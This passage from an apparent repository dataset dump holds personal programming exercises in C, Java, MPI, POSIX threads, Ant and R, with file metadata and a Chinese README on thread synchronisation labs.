memcpy(tmp->full_packet, full_packet, packet_header->caplen);\n\n tmp->garbage = 0;\n tmp->next = NULL;\n tmp->prev = NULL;\n\n /* set header etc. 
properly */\n buf->header = tmp;\n buf->tail = tmp;\n buf->items++;\n } else {\n /* has one or more items */\n if ((tmp = (item*)malloc(sizeof(item))) == NULL) {\n fprintf(stderr, \"could not allocate memory for an item\\n\");\n exit(-1);\n }\n\n /* allocate space for packet header */\n if ((tmp->packet_header =\n (struct pcap_pkthdr*)malloc(sizeof(struct pcap_pkthdr))) == NULL) {\n fprintf(stderr, \"could not allocate memory for packet header\\n\");\n exit(-1);\n }\n memcpy(tmp->packet_header, packet_header, sizeof(struct pcap_pkthdr));\n\n /* allocate space for full packet */\n if ((tmp->full_packet = (u_char*)malloc(packet_header->caplen)) == NULL) {\n fprintf(stderr, \"could not allocate memory for full packet\\n\");\n exit(-1);\n }\n memcpy(tmp->full_packet, full_packet, packet_header->caplen);\n\n tmp->garbage = 0;\n\n /* set header etc. properly */\n /* for the new node, next is current header\n * prev is NULL\n */\n tmp->next = buf->header;\n tmp->prev = NULL;\n\n /* for the current header,\n * prev is new node\n */\n (buf->header)->prev = tmp;\n\n /* header is new node */\n buf->header = tmp;\n buf->items++;\n }\n\n /* signal the garbage collector here */\n gc(buf);\n\n#ifdef DEBUG\n fprintf(stderr, \".\");\n#endif\n\n return 0;\n}\n\n/* a stupid mark and sweep approach */\nint gc(buffer* buf) {\n item* tail;\n item* tmp;\n long long int i;\n long long int half_i;\n long long int removed = 0;\n\n /* start collection only if more than GARBAGE_SIZE items present in the buffer\n */\n if (buf->items <= buf->garbage_size) return 0;\n\n /* sweep half the buffer (minus the first two elements)\n * from tail and delete them if they are ready for collection\n */\n tail = buf->tail;\n half_i = buf->items / 2;\n i = 0;\n\n /* do a simple sweep from behind and remove items marked for collection */\n\n /* case 1: remove all tail items that are marked for deletion\n * most likely all the items in the back of the buffer are marked\n * for collection, so from tail we 
expect a long continous list\n * available for collection. let us cycle thru them first\n */\n while ((i < half_i) && (tail->garbage)) {\n tail = tail->prev; /* move one ahead */\n free(tail->next); /* free the follower */\n tail->next = NULL; /* follower is NULL */\n\n /* update the items at the end, so that apend\n * doesn't need to wait very often for the lock]\n */\n /* buf->items--;*/ /* one less item */\n ++removed;\n ++i;\n }\n buf->items -= removed;\n\n /* case 2: we would get out of the above loop when either all garbage\n * is collected (i >= half_i) or there was an item found that's not\n * ready for collection. in this case we may end up removing stuff from\n * the middle of the buffer. so lets do that next.\n */\n\n /* Houston we have a problem! we are running out of battery power!*/\n\n removed = 0;\n /* get in here only if we need to remove something in the middle */\n while ((i < half_i) && (tail != NULL)) {\n /* in the middle */\n if (tail->garbage) {\n (tail->prev)->next = tail->next;\n (tail->next)->prev = tail->prev; /* expect a bark for last item */\n tmp = tail;\n tail = tail->prev;\n free(tmp);\n\n /* update the items at the end so that append doesn't have to\n * wait for lock very often\n */\n /* buf->items--;*/ /* one less item */\n ++i;\n } else {\n tail = tail->prev;\n ++i;\n }\n }\n buf->items -= removed;\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5942720770835876, "alphanum_fraction": 0.6133651733398438, "avg_line_length": 18.090909957885742, "blob_id": "2e8fe15aa3207c3e5cb1c001ce10ad58caa0d2fe", "content_id": "2fd0ed142eb3b168549503e64b6811977b2a903c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 419, "license_type": "permissive", "max_line_length": 51, "num_lines": 22, "path": "/java/projects/algorithms/chapter1/part1/Q20.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q20\n */\nimport java.util.Scanner;\nimport 
java.lang.Math;\n\npublic class Q20 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n\n while (scanner.hasNext())\n System.out.println(myLog(scanner.nextInt()));\n\n scanner.close();\n }\n\n public static double myLog(int n) {\n assert (n > 0);\n if (n == 1) return 0;\n return myLog(n - 1) + Math.log((double)n);\n }\n}" }, { "alpha_fraction": 0.6251968741416931, "alphanum_fraction": 0.6267716288566589, "avg_line_length": 20.931034088134766, "blob_id": "573cfd5070cccb1668b80bca876e3bd52d8669e5", "content_id": "c973653898611bd6325dbdfa7aaa426825c67b6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 635, "license_type": "permissive", "max_line_length": 67, "num_lines": 29, "path": "/c/projects/MPI/hardway/MPI_rank.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <time.h>\n#include <stdio.h>\n\nvoid print_now_time() {\n time_t rawtime;\n struct tm * timeinfo;\n\n time ( &rawtime );\n timeinfo = localtime ( &rawtime );\n printf ( \"Current local time and date: %s\", asctime (timeinfo) );\n\n printf(\"Current Timer: %f\\n\\n\", ((float)clock())/CLOCKS_PER_SEC);\n}\n\n\nint main(int argc, char **argv) {\n\n int process_id, process_num;\n \n MPI_Init(&argc, &argv);\n MPI_Comm_size(MPI_COMM_WORLD, &process_num);\n MPI_Comm_rank(MPI_COMM_WORLD, &process_id);\n printf(\"total has %d, now is %d\\n\", process_num, process_id);\n print_now_time();\n MPI_Finalize();\n \n return 0;\n}" }, { "alpha_fraction": 0.6416184902191162, "alphanum_fraction": 0.6445086598396301, "avg_line_length": 18.27777862548828, "blob_id": "cf14c419be21dda3abb0ffc2c6dbb4d1fad0d164", "content_id": "aefd33ee6c9adc81c85155c1b8a23ef61d076671", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 418, "license_type": "permissive", "max_line_length": 49, "num_lines": 18, "path": 
"/c/projects/MPI/hardway/MPI_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\n\nint main(int argc, char**argv) {\n int process_num;\n MPI_Init(&argc, &argv);\n \n // int MPI_Comm_size(MPI_Comm comm, int *rank)\n // 获取指定通信域的进程个数。\n // 第一个参数是通信子,第二个参数返回进程的个数。\n MPI_Comm_size(MPI_COMM_WORLD, &process_num);\n\n printf(\"the process num is %d\\n\", process_num);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.7935517430305481, "alphanum_fraction": 0.8086323738098145, "avg_line_length": 38.26530456542969, "blob_id": "033ce27c9220a53893950c1b2a1ca790a7878cd2", "content_id": "c392a87fded9cfba8496034b6572fbc1d0e24401", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4123, "license_type": "permissive", "max_line_length": 250, "num_lines": 49, "path": "/c/projects/POSIX/Lab3/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Linux POSIX线程互斥和同步\n\n## HelloWorld\n这就必须要使用上次的进程相关的知识了,上锁机制的目的也就是为了进程间的同步,说简单点就是只能有一个进程访问关键区。\n\n样例很通俗,不管是创建使用进程部分还是使用mutex部分,基本思路就是上锁解锁,要记得在一开始要初始化最后要摧毁。\n\n因为简单,自然没有包括mutex的三种类型和两种初始化方法。\n\n## semaphore\n信号量还是很有意思的,使用的方法和mutex套路是一样的,不同在于这里可以指定一个初始值,不过例程改为纯C语言描述后在mac OS 下是会报启用警告的,具体可以参考这个[问题](https://stackoverflow.com/questions/27736618/why-are-sem-init-sem-getvalue-sem-destroy-deprecated-on-mac-os-x-and-w),最开始还想蒙混过关,最后还是不行,所以最后的编写环境是`Ubuntu 16.04LTS`\n不过还是有点疑惑,双值和计数型信号量是怎么区分的,后看看到了参考如下\n```\n#include <semaphore.h>\n\nint sem_init( sem_t * sem, \n int pshared, \n unsigned value );\nvalue\nThe initial value of the semaphore. A positive value (i.e., greater than zero) indicates an unlocked semaphore, and a value of 0 (zero) indicates a locked semaphore. 
This value must not exceed SEM_VALUE_MAX.\n```\n嗯这就好办了。\n\n## 生产者消费者问题\n> 设计一个程序来解决有限缓冲问题,其中的生产者与消费者进程如图6.10 与图6.11 所示。\n> 在6.6.1 小节中,使用了三个信号量: empty (以记录有多少空位)、full (以记录有多少满位)以及mutex (二进制信号量或互斥信号量,以保护对缓冲插入与删除的操作)。对于本项目, empty 与full 将采用标准计数信号量,而mutex 将采用二进制信号量。生产者与消费者作为独立线程,在empty、full、mutex 的同步前提下,对缓冲进行插入与删除。\n> 本项目,可采用Pthread 。\n\n嗯,思路大概是先写出文件读写框架,然后加入创建线程部分,最后加入信号量部分,具体的代码和输出请参考3.1部分,因为书上本来就有算法所以写起来也没费太大功夫。\n\n## 读者写者问题\n> 实验要求\n> 在Linux环境下,创建一个进程,此进程包含n个线程。用这n个线程来表示n个读者或写者。每个线程按相应测试数据文件(后面有介绍)的要求进行读写操作。用信号量机制分别实现读者优先和写者优先的读者-写者问题。\n> 读者-写者问题的读写操作限制(仅读者优先或写者优先):\n> 1)写-写互斥,即不能有两个写者同时进行写操作。\n> 2)读-写互斥,即不能同时有一个线程在读,而另一个线程在写。\n> 3)读-读允许,即可以有一个或多个读者在读。\n> 读者优先的附加限制:如果一个读者申请进行读操作时已有另一个读者正在进行读操作,则该读者可直接开始读操作。\n> 写者优先的附加限制:如果一个读者申请进行读操作时已有另一写者在等待访问共享资源,则该读者必须等到没有写者处于等待状态后才能开始读操作。\n> 运行结果显示要求:要求在每个线程创建、发出读写操作申请、开始读写操作和结束读写操作时分别显示一行提示信息,以确定所有处理都遵守相应的读写操作限制。\n\n有了上面一次的经验,这次写的就很轻松,读者优先书上是给出算法了的,所以对着翻译就好了,写者优先参考了网上的算法,用的锁有点多,具体请参考3.2对应文件部分。\n\n## 心得体会\n\n进程通信比想象中有意思,不过目前的所有程序都是数据以全局变量共享,如果以后有机会想试一下真正意义上的共享存储空间,另外就是踩了很多坑,主要是关于环境的问题,之前一直是在mac OS下进行C编程,现在重新装了Linux虚拟机倒也还行。\n\n## REFERENCE\n[POSIX Threads Programming](https://computing.llnl.gov/tutorials/pthreads/)" }, { "alpha_fraction": 0.5680429339408875, "alphanum_fraction": 0.5695241689682007, "avg_line_length": 39.92424392700195, "blob_id": "2b70e4e21b43a284d6ae5c91910d17fc5c09fc43", "content_id": "5018597ac47a44a1929fa5a4dfde09b208ee40d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ant Build System", "length_bytes": 5401, "license_type": "permissive", "max_line_length": 154, "num_lines": 132, "path": "/java/projects/gridworld/docs/Use_Junit_in_Ant/build.xml", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project name=\"Hello\" basedir=\".\" default=\"package\">\n\n <property name=\"version\" value=\"1.6\"/>\n <property name=\"haltonfailure\" value=\"no\"/>\n\n <property name=\"out\" value=\"out\"/>\n\n 
<property name=\"production.src\" value=\"src\"/>\n <property name=\"production.lib\" value=\"lib\"/>\n <property name=\"production.resources\" value=\"config\"/>\n <property name=\"production.classes\" value=\"${out}/production/${ant.project.name}\"/>\n\n <property name=\"test.src\" value=\"test\"/>\n <property name=\"test.lib\" value=\"lib\"/>\n <property name=\"test.resources\" value=\"config\"/>\n <property name=\"test.classes\" value=\"${out}/test/${ant.project.name}\"/>\n\n <property name=\"exploded\" value=\"out/exploded/${ant.project.name}\"/>\n <property name=\"exploded.classes\" value=\"${exploded}/WEB-INF/classes\"/>\n <property name=\"exploded.lib\" value=\"${exploded}/WEB-INF/lib\"/>\n\n <property name=\"reports.out\" value=\"${out}/reports\"/>\n <property name=\"junit.out\" value=\"${reports.out}/junit\"/>\n <property name=\"testng.out\" value=\"${reports.out}/testng\"/>\n\n <path id=\"production.class.path\">\n <pathelement location=\"${production.classes}\"/>\n <pathelement location=\"${production.resources}\"/>\n <fileset dir=\"${production.lib}\">\n <include name=\"**/*.jar\"/>\n <exclude name=\"**/junit*.jar\"/>\n <exclude name=\"**/*test*.jar\"/>\n </fileset>\n </path>\n\n <path id=\"test.class.path\"> \n <path refid=\"production.class.path\"/>\n <pathelement location=\"${test.classes}\"/>\n <pathelement location=\"${test.resources}\"/>\n <fileset dir=\"${test.lib}\">\n <include name=\"**/junit*.jar\"/>\n <include name=\"**/*test*.jar\"/>\n </fileset>\n </path>\n\n <path id=\"testng.class.path\">\n <fileset dir=\"${test.lib}\">\n <include name=\"**/testng*.jar\"/>\n </fileset>\n </path>\n\n <available file=\"${out}\" property=\"outputExists\"/>\n\n <target name=\"clean\" description=\"remove all generated artifacts\" if=\"outputExists\">\n <delete dir=\"${out}\" includeEmptyDirs=\"true\"/>\n <delete dir=\"${reports.out}\" includeEmptyDirs=\"true\"/>\n </target>\n\n <target name=\"create\" description=\"create the output directories\" 
unless=\"outputExists\">\n <mkdir dir=\"${production.classes}\"/>\n <mkdir dir=\"${test.classes}\"/>\n <mkdir dir=\"${reports.out}\"/>\n <mkdir dir=\"${junit.out}\"/>\n <mkdir dir=\"${testng.out}\"/>\n <mkdir dir=\"${exploded.classes}\"/>\n <mkdir dir=\"${exploded.lib}\"/>\n </target>\n\n <target name=\"compile\" description=\"compile all .java source files\" depends=\"create\">\n <!-- Debug output\n <property name=\"production.class.path\" refid=\"production.class.path\"/>\n <echo message=\"${production.class.path}\"/>\n -->\n <javac srcdir=\"src\" destdir=\"${out}/production/${ant.project.name}\" debug=\"on\" source=\"${version}\">\n <classpath refid=\"production.class.path\"/>\n <include name=\"**/*.java\"/>\n <exclude name=\"**/*Test.java\"/>\n </javac>\n <javac srcdir=\"${test.src}\" destdir=\"${out}/test/${ant.project.name}\" debug=\"on\" source=\"${version}\">\n <classpath refid=\"test.class.path\"/>\n <include name=\"**/*Test.java\"/>\n </javac>\n </target>\n\n <target name=\"junit-test\" description=\"run all junit tests\" depends=\"compile\">\n <!-- Debug output\n <property name=\"test.class.path\" refid=\"test.class.path\"/>\n <echo message=\"${test.class.path}\"/>\n -->\n <junit printsummary=\"yes\" haltonfailure=\"${haltonfailure}\">\n <classpath refid=\"test.class.path\"/>\n <formatter type=\"xml\"/>\n <batchtest fork=\"yes\" todir=\"${junit.out}\">\n <fileset dir=\"${test.src}\">\n <include name=\"**/*Test.java\"/>\n </fileset>\n </batchtest>\n </junit>\n <junitreport todir=\"${junit.out}\">\n <fileset dir=\"${junit.out}\">\n <include name=\"TEST-*.xml\"/>\n </fileset>\n <report todir=\"${junit.out}\" format=\"frames\"/>\n </junitreport>\n </target>\n\n <taskdef resource=\"testngtasks\" classpathref=\"testng.class.path\"/>\n <target name=\"testng-test\" description=\"run all testng tests\" depends=\"compile\">\n <!-- Debug output\n <property name=\"test.class.path\" refid=\"test.class.path\"/>\n <echo message=\"${test.class.path}\"/>\n -->\n <testng 
classpathref=\"test.class.path\" outputDir=\"${testng.out}\" haltOnFailure=\"${haltonfailure}\" verbose=\"2\" parallel=\"methods\" threadcount=\"50\">\n <classfileset dir=\"${out}/test/${ant.project.name}\" includes=\"**/*.class\"/>\n </testng>\n </target>\n\n <target name=\"exploded\" description=\"create exploded deployment\" depends=\"testng-test\">\n <copy todir=\"${exploded.classes}\">\n <fileset dir=\"${production.classes}\"/>\n </copy>\n <copy todir=\"${exploded.lib}\">\n <fileset dir=\"${production.lib}\"/>\n </copy>\n </target>\n\n <target name=\"package\" description=\"create package file\" depends=\"exploded\">\n <jar destfile=\"${out}/${ant.project.name}.jar\" basedir=\"${production.classes}\" includes=\"**/*.class\"/>\n </target>\n\n</project>" }, { "alpha_fraction": 0.42990654706954956, "alphanum_fraction": 0.4392523467540741, "avg_line_length": 9.699999809265137, "blob_id": "f5cee7207aac79cf11948f4e2ad30701ec0a79c6", "content_id": "4be9de7bfaabda62dafa6f8ebf0752df214065e7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 107, "license_type": "permissive", "max_line_length": 19, "num_lines": 10, "path": "/c/hardwork/hardway/static_in_func.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nvoid m() {\n static int x = 5;\n x++;\n printf(\"%d\", x);\n}\nint main() {\n m();\n m();\n}\n" }, { "alpha_fraction": 0.4480796456336975, "alphanum_fraction": 0.4722617268562317, "avg_line_length": 19.08571434020996, "blob_id": "5f8a27b2464fbdd171d76400e9d4057ed3e69f9c", "content_id": "f00af7ad24074ab329a0e6875bebb5ada21fcce3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 703, "license_type": "permissive", "max_line_length": 77, "num_lines": 35, "path": "/c/hardwork/hardway/sort_string(bubble).cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include 
<string.h>\n\nchar *sortString(const char *const s) {\n int i, j, a;\n int len = strlen(s);\n char *str = new char[len];\n strcpy(str, s);\n for (i = 0; i < len; i++)\n for (j = 0; j < len; j++)\n if (str[i] < str[j]) {\n a = str[i];\n str[i] = str[j];\n str[j] = a;\n }\n return str;\n}\n\nvoid sortString(const char *const s, char *s1) { strcpy(s1, sortString(s)); }\n\nint main() {\n char a[] = \"123456\";\n char *p = sortString(a);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n char *p2 = a;\n sortString(a, p2);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n return 0;\n}\n" }, { "alpha_fraction": 0.5711462497711182, "alphanum_fraction": 0.5869565010070801, "avg_line_length": 18.09433937072754, "blob_id": "faaf505c70f158bf3943c0465a1411eaa304b311", "content_id": "6c7cfd31a0775a04a12c5d0d6a9fd3f374abf4f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1012, "license_type": "permissive", "max_line_length": 65, "num_lines": 53, "path": "/c/projects/POSIX/Lab3/3.0.helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * jskyzero 2017(R) in SYSU\n * create 10 thread and calcute\n */\n\n#include <errno.h>\n#include <pthread.h>\n#include <stdio.h>\n#include <stdlib.h>\n\n#define THREAD_NUMBER 10\n\n// initial mutex\nstatic pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;\n// glabal data store\nint sum = 0;\n\n// thread function\nvoid *inc(void *arg) {\n int i = (*(int *)arg);\n // lock\n pthread_mutex_lock(&mutex);\n sum = sum + i;\n // unlock\n pthread_mutex_unlock(&mutex);\n return NULL;\n}\n\nint main(int argc, char *argv[]) {\n pthread_t pt[THREAD_NUMBER];\n int args[THREAD_NUMBER];\n for (int i = 0; i < THREAD_NUMBER; i++) {\n args[i] = i;\n if (pthread_create(&pt[i], NULL, inc, (void *)&args[i]) != 0)\n {\n printf(\"pthread_create error\\n\");\n exit(1);\n }\n }\n \n for (int i = 0; i < 
THREAD_NUMBER; i++)\n {\n if (pthread_join(pt[i], NULL) != 0) {\n printf(\"pthread_join error\\n\");\n exit(1);\n }\n }\n\n printf(\"sum is %d\\n\", sum);\n // distory mutex\n pthread_mutex_destroy(&mutex);\n return 0;\n}\n" }, { "alpha_fraction": 0.6319290399551392, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 17.79166603088379, "blob_id": "1bfba9e28c801ea60f44773d02a2d8cb80807efd", "content_id": "0b39d42f223916a3de57b8dc0d98a982718d289a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 451, "license_type": "permissive", "max_line_length": 58, "num_lines": 24, "path": "/c/hardwork/hardway/_struct_node.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nstruct Node {\n\tint data;\n\tstruct Node * next;\n};\n\ntypedef struct Node Node;\n\n/*\ntypedef struct Node {\n int date;\n struct Node *next;\n } LNode, *LinkList; \n*/\nint main() {\n Node head = {0, NULL};\n printf(\"sizeof Node %ld\\n\", sizeof(Node));\n printf(\"sizeof Instance %ld\\n\", sizeof(head));\n printf(\"sizeof Instance data %ld\\n\", sizeof(head.data));\n printf(\"sizeof Instance next %ld\\n\", sizeof(head.next));\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6231772899627686, "alphanum_fraction": 0.6308518648147583, "avg_line_length": 24.076923370361328, "blob_id": "c1f48fe4f35088620a7853e82d9c0fd64a4c46b0", "content_id": "d17b121b48ca72ba3e50e65d81e872940981bf49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1487, "license_type": "permissive", "max_line_length": 77, "num_lines": 52, "path": "/c/projects/MPI/hardway/MPI_group_compare.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 对两个进程组做最基本的判断,例如成员是否相同,次序是否一致等等。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world, new_group_world;\n int members[5];\n int result;\n\n 
MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n members[0] = 0;\n\n MPI_Group_incl(group_world, 1, members, &new_group_world);\n\n if (myid == 0) {\n // int MPI_Group_compare(MPI_Group group1, MPI_Group group2, int *result)\n MPI_Group_compare(group_world, group_world, &result);\n\n if (result == MPI_IDENT) {\n printf(\"Now the groups are identical.\\n\");\n } else if (result == MPI_SIMILAR) {\n printf(\"Now the groups are similar.\\n\");\n } else {\n printf(\"Now the groups are unequal.\\n\");\n }\n\n // 如果在两个组中成员和次序完全相等,返回MPI_IDENT。\n // 例如在group1和group2是同一句柄时就会发生这种情况。\n // 如果组成员相同而次序不同则返回MPI_SIMILAR,否则返回MPI_UNEQUAL。\n MPI_Group_compare(new_group_world, group_world, &result);\n \n\n if (result == MPI_IDENT) {\n printf(\"Now the groups are identical.\\n\");\n } else if (result == MPI_SIMILAR) {\n printf(\"Now the groups are similar.\\n\");\n } else {\n printf(\"Now the groups are unequal.\\n\");\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.47422680258750916, "alphanum_fraction": 0.4845360815525055, "avg_line_length": 13.076923370361328, "blob_id": "2c57e73f17d24f1603fbfd80f684fa6a34c118df", "content_id": "d1d753f61fbfdbdabf95f91bc057676f4a42c564", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 194, "license_type": "permissive", "max_line_length": 35, "num_lines": 13, "path": "/c/hardwork/library/stdio/freopen.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n\r\nint main() {\r\n freopen(\"printf.c\", \"r\", stdin);\r\n freopen(\"1\", \"w\", stdout);\r\n\r\n char ch;\r\n while ((ch = getchar()) != EOF) {\r\n putchar(ch);\r\n }\r\n \r\n return 0;\r\n}" }, { "alpha_fraction": 0.3802816867828369, "alphanum_fraction": 0.38732394576072693, "avg_line_length": 16.625, "blob_id": "dcfcebcdeca495e9be06797e39bed783ce420547", 
"content_id": "95a25ed61e972587e7adb9cc817d96ed5f4343ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 142, "license_type": "permissive", "max_line_length": 37, "num_lines": 8, "path": "/c/hardwork/hardway/extern.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\t int i;\n\t int main()\n\t {\n extern int i;\n\t if (i == 0)\n\t printf(\"scope rules\\n\");\n\t }\n\n" }, { "alpha_fraction": 0.5829145908355713, "alphanum_fraction": 0.5879396796226501, "avg_line_length": 18.899999618530273, "blob_id": "3ab20331ded5223470dfd0bd5a3104ab4f0842d5", "content_id": "39414d0b8955295dd735a62bda60b914f3093d08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 199, "license_type": "permissive", "max_line_length": 34, "num_lines": 10, "path": "/c/hardwork/hardway/strcpy.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n#include <stdio.h>\nint main() {\n char str[] = \"hello, world!!\\n\";\n char strc[] = \"good morning\\n\";\n strcpy(strc, str);\n printf(\"%s\\n\", strc);\n return 0;\n}\n" }, { "alpha_fraction": 0.700952410697937, "alphanum_fraction": 0.7161904573440552, "avg_line_length": 36.57143020629883, "blob_id": "8ad62c2795053a4477af46308d0edac6f940cbb5", "content_id": "ab613ebbacc33879a1a3823fbc8374cdfac7e0e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 527, "license_type": "permissive", "max_line_length": 149, "num_lines": 14, "path": "/java/projects/todolist/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# todolist\n`jskyzero` `2017/12/31`\n\n## Overview\n\n+ a simpile todolist application powered by java.\n+ use `gson` to save to file.\n+ you can use some really excellent IDE like `IntelliJ IDEA`.\n+ anyway, now I use `vscode` and sometimes 
do the dirty work by hand.\n\n## Install & Run:\n\n+ if you use IDE like `IntelliJ IDEA`, it will be easy to run or build to jar, to run the jar you can use `java -classpath TodoList.jar TodoList.UI`.\n+ if you want learn maven, that't good, you can use `mvn install` then `mvn exec:java` to run." }, { "alpha_fraction": 0.5584415793418884, "alphanum_fraction": 0.5974025726318359, "avg_line_length": 13, "blob_id": "187ed900237459ff81a2c162b563efe38006bf29", "content_id": "6ec04353d56578e240a29047779873f8c3cfac8b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 154, "license_type": "permissive", "max_line_length": 20, "num_lines": 11, "path": "/c/hardwork/hardway/if.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#define SYSTEM 20\nint main() {\n int a = 20;\n#if SYSTEM == a\n printf(\"HELLO \");\n#endif\n#if SYSTEM == 20\n printf(\"WORLD\\n\");\n#endif\n}\n" }, { "alpha_fraction": 0.3550420105457306, "alphanum_fraction": 0.38445377349853516, "avg_line_length": 14.866666793823242, "blob_id": "324df5c8b296cfb40c671fd8fc6704f992eb0c12", "content_id": "27ccea0ff4ceff48539abe71db5c352b18fcb2ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 476, "license_type": "permissive", "max_line_length": 42, "num_lines": 30, "path": "/c/hardwork/hardway/pow.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <math.h> // for pow()\n\nint k, N, n;\ndouble ans;\nint a[32];\n\nvoid f(int _N, int _n) {\n if (_n < 0 || _N < 1) return;\n\n if (_N >= a[_n]) {\n f(_N - a[_n], _n);\n ans += pow(k, _n);\n } else\n f(_N, _n - 1);\n}\n\nint main() {\n scanf(\"%d %d\", &k, &N);\n a[0] = 1;\n for (int i = 1; i < 32; i++) {\n a[i] = 2 * a[i - 1];\n if (a[i] > N) {\n n = i - 1;\n break;\n }\n }\n f(N, n);\n printf(\"%.0lf\\n\", ans);\n}\n" }, { "alpha_fraction": 
0.4370861053466797, "alphanum_fraction": 0.5165562629699707, "avg_line_length": 12.757575988769531, "blob_id": "161d45d555a8ce18c816f0f88f8b6c612af733eb", "content_id": "dc051d32e0c523aaeb860e6a9c4c0a8a09e253d6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 453, "license_type": "permissive", "max_line_length": 68, "num_lines": 33, "path": "/R/harwork/hardway/operator.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Operators in R\n\n# arithmetic operator\nv1 <- c(1, 2, 3)\nv2 <- c(4, 5, 6)\n\nprint(v1 + v2)\nprint(v1 - v2)\nprint(v1 * v2)\nprint(v1 / v2)\nprint(v2 %% v1)\nprint(v2 %/% v1)\nprint(v1 ^ v2)\n\n# relation operator\nprint (v1 < v1) # \"every < \" => \" < \"\n\n# logic operator \n# & | !\n\n# assignment operator\n# <- <<- =\n# -> ->>\n\n# others\nv <- 1:9\nprint(v)\n\nprint(-1 %in% v)\n\nM <- matrix( c(2, 6, 5, 1, 10, 4), nrow = 2, ncol = 3, byrow = TRUE)\nt <- M %*% t(M)\nprint(t)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5249999761581421, "avg_line_length": 19.16666603088379, "blob_id": "0472b20f7acef59ef5df5933ca2f1eb132c18f77", "content_id": "cd6c81e83acb8990035a096f5385348b51c756b3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 120, "license_type": "permissive", "max_line_length": 33, "num_lines": 6, "path": "/c/hardwork/hardway/argc_argv.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(int argc, char** argv) {\n char s[] = \"myworld\";\n int i = 3;\n printf(\"%10.*s %%\", i, s);\n}" }, { "alpha_fraction": 0.7283950448036194, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 15.199999809265137, "blob_id": "bd4cdf9cb106654d96d69349badd016b452cce57", "content_id": "2def1ad46cfab2b9aef3421fecf409625861718f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 185, 
